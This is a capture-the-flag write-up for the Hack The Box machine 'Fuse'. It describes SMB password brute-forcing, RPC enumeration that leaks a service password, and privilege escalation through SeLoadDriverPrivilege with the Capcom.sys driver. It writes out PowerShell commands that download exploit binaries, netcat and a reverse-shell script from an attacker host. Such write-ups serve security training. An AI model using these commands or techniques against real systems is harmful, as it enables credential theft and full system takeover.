Fuse- Hack The Box
Summary
Fuse is a medium-level windows machine on Hack The Box. An initial foothold is gained by discovering an expired password that can get access to SMB shares and RPCClient. A user shell is obtained by enumerating the printer in RPCClient and determining a password used by one of the users. Administrative privileges are obtained by abusing SeLoadDriverPrivilege.
Enumeration
We have seen a lot of ports open.
Visiting port 80 it redirected to Http://fuse.fabricorp.local/papercut/logs/html/index.htm
The website has some excel files which contain some data.
I made my own list of users from an excel file that we found on port 80
Tried brute-force on smb to check the user and password
We used the username bnielson and password Fabricorp01. It is asking to change the password.
We changed the user bnielson pass from Fabricorp01 to Rohit@22
Reference :
Enumerating RPC
We log in with the Rohit@202 password and we got access. Once logged in, use the enumdomusers command to enumerate users on the domain:
Enumerated the printers and found a new password.
We got a new password but not sure which user is valid. Again tried a brute-force attack on winrm to see which user is correct.
We found that user svc-print is the right user.
Login into winrm to gain user access.
#Command
$ ./evil-winrm.rb -i 10.10.10.193 -u svc-print -p ‘$fab@s3Rv1ce$1’
Privilege Escalation
SeLoadDriverPrivilege
A very dangerous privilege to assign to any user — it allows the user to load kernel drivers and execute code with kernel privileges aka NT\System
- Enable the SeLoadDriverPrivilege privilege
- Create the registry key under HKEY_CURRENT_USER (HKCU) and set driver configuration settings
- Execute the NTLoadDriver function, specifying the registry key previously created
In the below screenshot, I compiled the code into .exe format.
We have uploaded the EOPLLOADDRIVER.exe and the Capcom.sys to the box. With these two files, I can load the malicious driver. To get SYSTEM access, I need to have a reverse shell that can be executed by the exploit.
- netcat.bat — The reverse shell we created.
- EOPLOADDRIVER.exe — The EOPLOADDRIVER.exe which we compiled with Visual Studio
- ExploitCapcomrohit.exe — The exploit code we modified to call our reverse shell
- Capcom.sys — The driver that we have selected to exploit.
We have transferred all the files into the target box.
#Command
$ Invoke-WebRequest “http://10.10.14.11:8000/Capcom.sys" -OutFile C:\temp\Capcom.sys$ Invoke-WebRequest “http://10.10.14.11:8000/EOPLOADDRIVER.exe" -OutFile C:\temp\EOPLOADDRIVER.exe$ Invoke-WebRequest “http://10.10.14.11:8080/ExploitCapcom.exe" -OutFile C:\temp\ExploitCapcomrohit.exe$ Invoke-WebRequest “http://10.10.14.11:8080/nc.exe" -OutFile C:\temp\nc.exe$ Invoke-WebRequest “http://10.10.14.11:8080/netcat.bat" -OutFile C:\temp\netcat.bat
Code:
First, we load the driver. The Capcom.sys driver is loaded and it’s time to start the exploit (ExploitCapcomrohit.exe).
ExploitCapcomrohit.exe file contains netcat.bat file in the code line. In netcat.bat file. I wrote my reverse shell command.
I change the actual line in the code.
line 292:TCHAR CommandLine[] = TEXT(“C:\\Windows\\system32\\cmd.exe”) to TCHAR CommandLine[] = TEXT(“C:\temp\netcat.bat”)
Here we got a root shell.
Reference :
Thanks for reading.
Hack The Box Profile: https://www.hackthebox.eu/profile/116842
